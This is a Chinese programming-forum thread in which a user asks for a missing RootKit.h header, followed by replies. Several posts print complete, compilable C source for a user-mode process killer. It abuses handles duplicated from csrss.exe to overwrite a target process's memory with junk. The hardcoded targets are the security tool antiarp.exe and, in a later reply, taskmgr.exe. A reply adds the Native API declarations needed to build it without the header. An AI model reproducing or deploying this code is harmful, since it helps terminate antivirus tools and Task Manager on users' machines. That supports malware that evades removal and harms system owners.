RING3下内存清零法杀进程

Topsupper 2011-07-13 12:01:17
我在编译网上的这个例子,提示缺少RootKit.h头文件,请问谁有啊,在哪里可以下载到啊。
下面是其源代码:
/*************************************************************************
* 学习者: sudami
* 时间: 07/12/24
*
* 备注: 学习RING3下通过内存清零结束大部分进程的方法.思路如下:
*
* 遍历所有进程[隐藏进程暂时不在考虑之内]获得csrss.exe的PID,ZwOpenProcess得到其句柄-->
* 为ZwQuerySystemInformation 函数传递16号参数.获得系统句柄信息 -->
* 几乎系统所有的HANDLE结构体中,里面的ProcessId都是指向csrss.exe的,遍历每个进程-->
* 调用ZwDuplicateObject复制此进程的句柄表,ZwQueryInformationProcess得到
* PROCESS_BASIC_INFORMATION结构信息; 判断其中的UniqueProcessId是否和指定的PID相同-->
* 若相同,则相指定进程中写入垃圾数据,使进程死掉; 若不同,继续遍历.
*
*************************************************************************/

#include <windows.h>
#include <Ntsecapi.h>
#include <Aclapi.h>
#include <tlhelp32.h>
#include "G:\sudamiDriver\RootKit.h"

//////////////////////////////////////////////////////////////////////////

#pragma comment (lib,"ntdll.lib")
#pragma comment (lib, "Kernel32.lib")
#pragma comment (lib, "Advapi32.lib")
#pragma comment (linker, "/subsystem:windows")
#pragma comment (linker, "/ENTRY:main")

//------------------------------------------------------------------

DWORD GetPidByName (char *szName);
void KillProcess (ULONG dwProcessId);
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);


//////////////////////////////////////////////////////////////////////////
// 主函数入口
//
void main()
{
ULONG Pid;
HANDLE hToken;

OpenProcessToken (GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
EnablePrivilege (hToken, SE_DEBUG_NAME, TRUE);

if (Pid = GetPidByName("antiarp.exe")) {
KillProcess (Pid);
} else {
MessageBox (NULL, TEXT("The process is not exit,please check out."), TEXT("!"), MB_OK);
}
}

/////////////////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
// 函数名: GetPidByName
//
// 参数: char *szName
// --> 进程名
//
// 返回值: 指定进程的PID
//
// 功能: 通过CreateToolhelp32Snapshot函数遍历进程,找到制定进程的PID
// 对RootKit基本无用
//
DWORD GetPidByName (char *szName)
{
HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
PROCESSENTRY32 pe32 = {0};
DWORD dwRet=0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
return 0;

pe32.dwSize = sizeof(PROCESSENTRY32);

if (Process32First (hProcessSnap, &pe32)) {
do {
if (lstrcmpi(szName, pe32.szExeFile) == 0) {
dwRet=pe32.th32ProcessID;
break;
}
}while (Process32Next(hProcessSnap,&pe32));
}
else {
return 0;
}

if(hProcessSnap !=INVALID_HANDLE_VALUE) {
CloseHandle(hProcessSnap);
}

return dwRet;
}


/////////////////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
// 函数名: KillProcess
//
// 参数: ULONG dwProcessId
// --> 进程ID
//
// 返回值: NULL
//
// 功能: 向指定的进程空间填充垃圾信息.使进程死掉
//
void KillProcess (ULONG dwProcessId)
{
HMODULE hNTDLL = GetModuleHandle("ntdll.dll");
HANDLE ph, h_dup;

PSYSTEM_HANDLE_INFORMATION h_info;
PROCESS_BASIC_INFORMATION pbi;

// 得到 csrss.exe 进程的PID
HANDLE csrss_id = (HANDLE) GetPidByName ("csrss.exe");
CLIENT_ID client_id;
client_id.UniqueProcess = csrss_id;
client_id.UniqueThread = 0;

// 初始化对象结构体
OBJECT_ATTRIBUTES attr;
attr.Length = sizeof(OBJECT_ATTRIBUTES);
attr.RootDirectory = 0;
attr.ObjectName = 0;
attr.Attributes = 0;
attr.SecurityDescriptor = 0;
attr.SecurityQualityOfService = 0;


////////////////////////////////////////////////////////////////////////////////////
// 获得这些函数的实际地址

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation =
(ZWQUERYSYSTEMINFORMATION) GetProcAddress (hNTDLL, "ZwQuerySystemInformation");

ZWOPENPROCESS ZwOpenProcess =
(ZWOPENPROCESS) GetProcAddress (hNTDLL, "ZwOpenProcess");

ZWDUPLICATEOBJECT ZwDuplicateObject =
(ZWDUPLICATEOBJECT) GetProcAddress (hNTDLL, "ZwDuplicateObject");

ZWQUERYINFORMATIONPROCESS ZwQueryInformationProcess =
(ZWQUERYINFORMATIONPROCESS) GetProcAddress (hNTDLL, "ZwQueryInformationProcess");

ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory =
(ZWALLOCATEVIRTUALMEMORY) GetProcAddress (hNTDLL, "ZwAllocateVirtualMemory");

ZWPROTECTVIRTUALMEMORY ZwProtectVirtualMemory =
(ZWPROTECTVIRTUALMEMORY) GetProcAddress (hNTDLL, "ZwProtectVirtualMemory");

ZWWRITEVIRTUALMEMORY ZwWriteVirtualMemory =
(ZWWRITEVIRTUALMEMORY) GetProcAddress (hNTDLL, "ZwWriteVirtualMemory");

ZWFREEVIRTUALMEMORY ZwFreeVirtualMemory =
(ZWFREEVIRTUALMEMORY) GetProcAddress (GetModuleHandle("ntdll.dll"), "ZwFreeVirtualMemory");

ZWCLOSE ZwClose =
(ZWCLOSE) GetProcAddress (hNTDLL, "ZwClose");

////////////////////////////////////////////////////////////////////////////////////


// 打开CSRSS.EXE,获得其句柄
ZwOpenProcess (&ph, PROCESS_ALL_ACCESS, &attr, &client_id);

ULONG bytesIO = 0x400000;
PVOID buf = 0;

ZwAllocateVirtualMemory (GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE);

// 为 ZwQuerySystemInformation 函数传递16号参数.获得系统句柄信息保存在buff中
// buff的开始出保存的是系统句柄的数量.偏移4才是句柄信息
ZwQuerySystemInformation (SystemHandleInformation, buf, 0x400000, &bytesIO);
ULONG NumOfHandle = (ULONG) buf;
h_info = (PSYSTEM_HANDLE_INFORMATION)((ULONG)buf+4);

for (ULONG i= 0 ; i<NumOfHandle; i++, h_info++)
{
if ((h_info->ProcessId == (ULONG)csrss_id) && (h_info->ObjectTypeNumber == 5))
{
// 复制句柄
if (ZwDuplicateObject(
ph,
(PHANDLE)h_info->Handle,
(HANDLE)-1,
&h_dup,
0,
0,
DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS) {

ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO);
}


if (pbi.UniqueProcessId == dwProcessId)
{
MessageBox(0, "目标已确定!", "!", MB_OK);

for (i = 0x1000; i < 0x80000000; i = i + 0x1000)
{
PVOID pAddress = (PVOID) i;
ULONG sz = 0x1000;
ULONG oldp;

if (ZwProtectVirtualMemory (h_dup, &pAddress, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS) {
ZwWriteVirtualMemory(h_dup, pAddress, buf, 0x1000, &oldp);
}
}

MessageBox(0, "任务已完成!","!", 0);
// ZwClose(h_dup);
break;
}
}
}

bytesIO = 0;
ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE);
}


/////////////////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
// 函数名: EnablePrivilege
//
// 参数: HANDLE hToken ---> 进程句柄
// LPCTSTR szPrivName --->
// BOOL fEnable --->
//
// 返回值: TRUE | FALSE
//
// 功能: 提升当前进程到指定的特权级
//
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable)
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;

LookupPrivilegeValue (NULL, szPrivName, &tp.Privileges[0]. Luid);

tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;

AdjustTokenPrivileges (hToken, FALSE, &tp, sizeof(tp), NULL, NULL);

return((GetLastError() == ERROR_SUCCESS));
}

/////////////////////////////// END OF FILE /////////////////////////////////////
...全文
349 点赞 收藏 4
写回复
4 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
liu3zy 2013-02-28
//------------------ Native API声明结束 ------------------// //------------------ 程序正式开始 ------------------// DWORD GetPidByName(char *szName) { HANDLE hProcessSnap = INVALID_HANDLE_VALUE; PROCESSENTRY32 pe32={0}; DWORD dwRet=0; hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap == INVALID_HANDLE_VALUE) return 0; pe32.dwSize = sizeof(PROCESSENTRY32); if(Process32First(hProcessSnap, &pe32)) { do { if(lstrcmpi(szName,pe32.szExeFile)==0) { dwRet=pe32.th32ProcessID; break; } } while (Process32Next(hProcessSnap,&pe32)); } else return 0; if(hProcessSnap !=INVALID_HANDLE_VALUE) CloseHandle(hProcessSnap); return dwRet; } ///////////////////////////////////////////////////////////////////////// //----------------------------------------------------------------------- // 函数名: KillProcess // // 参数: ULONG dwProcessId // --> 进程ID // // 返回值: NULL // // 功能: 向指定的进程空间填充垃圾信息.使进程死掉 // void KillProcess (ULONG dwProcessId) { HMODULE hNTDLL = LoadLibrary ("ntdll"); HANDLE ph, h_dup; ULONG bytesIO; PVOID buf; ULONG i; CLIENT_ID cid1; OBJECT_ATTRIBUTES attr; HANDLE csrss_id; PROCESS_BASIC_INFORMATION pbi; PVOID p0, p1; ULONG sz, oldp; ULONG NumOfHandle; PSYSTEM_HANDLE_INFORMATION h_info; HMODULE hNtDll = ::GetModuleHandle( "ntdll.dll" ); if( hNtDll == NULL ) return ; //////////////////////////////////////////////////////////////////////////////////// // 获得这些函数的实际地址 // 函数 ++ // ZwQuerySystemInformation ZwQuerySystemInformation = (PNtZwQuerySystemInformation)GetProcAddress( hNtDll,"ZwQuerySystemInformation" ); if( ZwQuerySystemInformation == NULL ) return ; // ZwOpenProcess ZwOpenProcess = (PNtZwOpenProcess)GetProcAddress( hNtDll,"ZwOpenProcess" ); if( ZwOpenProcess == NULL ) return ; // ZwAllocateVirtualMemory ZwAllocateVirtualMemory = (PNtZwAllocateVirtualMemory)GetProcAddress( hNtDll,"ZwAllocateVirtualMemory" ); if( ZwAllocateVirtualMemory == NULL ) return ; // ZwDuplicateObject ZwDuplicateObject = (PNtZwDuplicateObject)GetProcAddress( hNtDll,"ZwDuplicateObject" ); if( ZwDuplicateObject == NULL ) return ; // ZwQueryInformationProcess ZwQueryInformationProcess = (PNtZwQueryInformationProcess)GetProcAddress( hNtDll,"ZwQueryInformationProcess" ); if( ZwQueryInformationProcess == NULL ) return ; // ZwProtectVirtualMemory ZwProtectVirtualMemory = (PNtZwProtectVirtualMemory)GetProcAddress( hNtDll,"ZwProtectVirtualMemory" ); if( ZwProtectVirtualMemory == NULL ) return ; // ZwWriteVirtualMemory ZwWriteVirtualMemory = (PNtZwWriteVirtualMemory)GetProcAddress( hNtDll,"ZwWriteVirtualMemory" ); if( ZwWriteVirtualMemory == NULL ) return ; // ZwClose ZwClose = (PNtZwClose)GetProcAddress( hNtDll,"ZwClose" ); if( ZwClose == NULL ) return ; // ZwFreeVirtualMemory ZwFreeVirtualMemory = (PNtZwFreeVirtualMemory)GetProcAddress( hNtDll,"ZwFreeVirtualMemory" ); if( ZwFreeVirtualMemory == NULL ) return ; //////////////////////////////////////////////////////////////////////////////////// // 得到 csrss.exe 进程的PID csrss_id = (HANDLE) GetPidByName ("csrss.exe"); CLIENT_ID client_id; client_id.UniqueProcess = csrss_id; client_id.UniqueThread = 0; // 初始化对象结构体 attr.Length = sizeof(OBJECT_ATTRIBUTES); attr.RootDirectory = 0; attr.ObjectName = 0; attr.Attributes = 0; attr.SecurityDescriptor = 0; attr.SecurityQualityOfService = 0; // 打开CSRSS.EXE,获得其句柄 ZwOpenProcess (&ph, PROCESS_ALL_ACCESS, &attr, &client_id); bytesIO = 0x400000; buf = 0; ZwAllocateVirtualMemory (GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE); // 为 ZwQuerySystemInformation 函数传递16号参数.获得系统句柄信息保存在buff中 // buff的开始出保存的是系统句柄的数量.偏移4才是句柄信息 ZwQuerySystemInformation (SystemHandleInformation, buf, 0x400000, &bytesIO); NumOfHandle = (ULONG) buf; h_info = (PSYSTEM_HANDLE_INFORMATION)((ULONG)buf+4); for (ULONG i= 0 ; i<NumOfHandle; i++, h_info++) { if ((h_info->ProcessId == (ULONG)csrss_id) && (h_info->ObjectTypeNumber == 5)) { // 复制句柄 if (ZwDuplicateObject( ph,(PHANDLE)h_info->Handle,(HANDLE)-1, &h_dup, 0, 0, DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS) { ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO); } if (pbi.UniqueProcessId == dwProcessId) { MessageBox(0, "目标已确定!", "!", MB_OK); for (i = 0x1000; i < 0x80000000; i = i + 0x1000) { PVOID pAddress = (PVOID) i; ULONG sz = 0x1000; ULONG oldp; if (ZwProtectVirtualMemory (h_dup, &pAddress, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS) { ZwWriteVirtualMemory(h_dup, pAddress, buf, 0x1000, &oldp); } } MessageBox(0, "任务已完成!","!", 0); // ZwClose(h_dup); break; } } } bytesIO = 0; ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE); } BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable) { TOKEN_PRIVILEGES tp; tp.PrivilegeCount = 1; LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid); tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0; AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL); return((GetLastError() == ERROR_SUCCESS)); } void main() { ULONG Pid; HANDLE hToken; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken); EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE); if (Pid = GetPidByName("taskmgr.exe")) { KillProcess(Pid); } ExitProcess(0); }
回复
liu3zy 2013-02-28
//以下是我的测试代码:注在win7似是编译后运行出错// #include <Windows.h> #include <Ntsecapi.h> #include <Aclapi.h> #include <tlhelp32.h> #pragma comment (lib,"ntdll.lib") // Copy From DDK #pragma comment (lib,"Kernel32.lib") #pragma comment (lib,"Advapi32.lib") #pragma comment(linker, "/ENTRY:main") #ifndef ULONG_PTR #define ULONG_PTR unsigned long #endif //------------------ 数据类型声明开始 --------------------// typedef struct _PROCESS_BASIC_INFORMATION { NTSTATUS ExitStatus; ULONG PebBaseAddress; ULONG_PTR AffinityMask; LONG BasePriority; ULONG_PTR UniqueProcessId; ULONG_PTR InheritedFromUniqueProcessId; } PROCESS_BASIC_INFORMATION; typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION; typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG ProcessId; UCHAR ObjectTypeNumber; UCHAR Flags; USHORT Handle; PVOID Object; ACCESS_MASK GrantedAccess; } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Reserved[2]; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef enum _SECTION_INHERIT { ViewShare = 1, ViewUnmap = 2 } SECTION_INHERIT; typedef struct _MY_PROCESS_INFO { ULONG PID; ULONG KPEB; ULONG CR3; CHAR Name[16]; ULONG Reserved; } MY_PROCESS_INFO, *PMY_PROCESS_INFO; typedef struct _CLIENT_ID { HANDLE UniqueProcess; HANDLE UniqueThread; } CLIENT_ID; typedef CLIENT_ID *PCLIENT_ID; typedef long NTSTATUS; //------------------ 数据类型声明结束 --------------------// //--------------------- 预定义开始 -----------------------// #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) #define STATUS_SUCCESS 0x00000000 #define STATUS_UNSUCCESSFUL 0xC0000001 #define STATUS_NOT_IMPLEMENTED 0xC0000002 #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004 //#define STATUS_INVALID_PARAMETER 0xC000000D #define STATUS_ACCESS_DENIED 0xC0000022 #define STATUS_BUFFER_TOO_SMALL 0xC0000023 #define OBJ_KERNEL_HANDLE 0x00000200 #define SystemModuleInformation 11 #define SystemHandleInformation 0x10 #define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES );(p)->RootDirectory = r; (p)->Attributes = a; (p)->ObjectName = n; (p)->SecurityDescriptor = s; (p)->SecurityQualityOfService = NULL; } //--------------------- 预定义结束 -----------------------// //------------------ Native API声明开始 ------------------// /* NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); */ typedef NTSTATUS (NTAPI* PNtZwQuerySystemInformation) (ULONG, PVOID, ULONG, PULONG); PNtZwQuerySystemInformation ZwQuerySystemInformation; /* NTSYSAPI NTSTATUS NTAPI ZwOpenProcess( OUT PHANDLE ProcessHandle, IN ACCESS_MASK AccessMask, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId ); */ typedef NTSTATUS (NTAPI* PNtZwOpenProcess) (OUT PHANDLE, IN ACCESS_MASK, IN POBJECT_ATTRIBUTES, IN PCLIENT_ID); PNtZwOpenProcess ZwOpenProcess; /* NTSYSAPI NTSTATUS NTAPI ZwAllocateVirtualMemory( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect ); */ typedef NTSTATUS (NTAPI* PNtZwAllocateVirtualMemory) (IN HANDLE, IN OUT PVOID, IN ULONG, IN OUT PULONG, IN ULONG, IN ULONG); PNtZwAllocateVirtualMemory ZwAllocateVirtualMemory; /* NTSYSAPI NTSTATUS NTAPI ZwDuplicateObject( IN HANDLE SourceProcessHandle, IN PHANDLE SourceHandle, IN HANDLE TargetProcessHandle, OUT PHANDLE TargetHandle, IN ACCESS_MASK DesiredAccess OPTIONAL, IN BOOLEAN InheritHandle, IN ULONG Options );*/ typedef NTSTATUS (NTAPI* PNtZwDuplicateObject) ( IN HANDLE, IN PHANDLE, IN HANDLE, OUT PHANDLE, IN ACCESS_MASK, IN BOOLEAN, IN ULONG); PNtZwDuplicateObject ZwDuplicateObject; /* NTSYSAPI NTSTATUS NTAPI ZwQueryInformationProcess( IN HANDLE ProcessHandle, IN PVOID ProcessInformationClass, OUT PVOID ProcessInformation, IN ULONG ProcessInformationLength, OUT PULONG ReturnLength );*/ typedef NTSTATUS(NTAPI* PNtZwQueryInformationProcess)(IN HANDLE, IN PVOID, OUT PVOID, IN ULONG, OUT PULONG ); PNtZwQueryInformationProcess ZwQueryInformationProcess; /* NTSYSAPI NTSTATUS NTAPI ZwProtectVirtualMemory( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN OUT PULONG NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection );*/ typedef NTSTATUS (NTAPI* PNtZwProtectVirtualMemory) (IN HANDLE, IN OUT PVOID, IN OUT PULONG, IN ULONG , OUT PULONG); PNtZwProtectVirtualMemory ZwProtectVirtualMemory; /* NTSYSAPI NTSTATUS NTAPI ZwWriteVirtualMemory( IN HANDLE ProcessHandle, IN PVOID BaseAddress, IN PVOID Buffer, IN ULONG NumberOfBytesToWrite, OUT PULONG NumberOfBytesWritten OPTIONAL ); */ typedef NTSTATUS (NTAPI *PNtZwWriteVirtualMemory) ( IN HANDLE, IN PVOID, IN PVOID, IN ULONG, OUT PULONG ); PNtZwWriteVirtualMemory ZwWriteVirtualMemory; /* NTSYSAPI NTSTATUS NTAPI ZwClose( IN HANDLE ObjectHandle ); */ typedef NTSTATUS (NTAPI *PNtZwClose) ( IN HANDLE ); PNtZwClose ZwClose; /* NTSYSAPI NTSTATUS NTAPI ZwFreeVirtualMemory( IN HANDLE ProcessHandle, IN PVOID *BaseAddress, IN OUT PULONG RegionSize, IN ULONG FreeType ); */ typedef NTSTATUS (NTAPI *PNtZwFreeVirtualMemory)( IN HANDLE, IN PVOID, IN OUT PULONG, IN ULONG ); PNtZwFreeVirtualMemory ZwFreeVirtualMemory;
回复
c_losed 2011-07-13
1.网上下载
2.找sudami要
回复
ouyh12345 2011-07-13
回复
相关推荐
发帖
其它技术问题
创建于2007-09-28

3849

社区成员

C/C++ 其它技术问题
申请成为版主
帖子事件
创建了帖子
2011-07-13 12:01
社区公告
暂无公告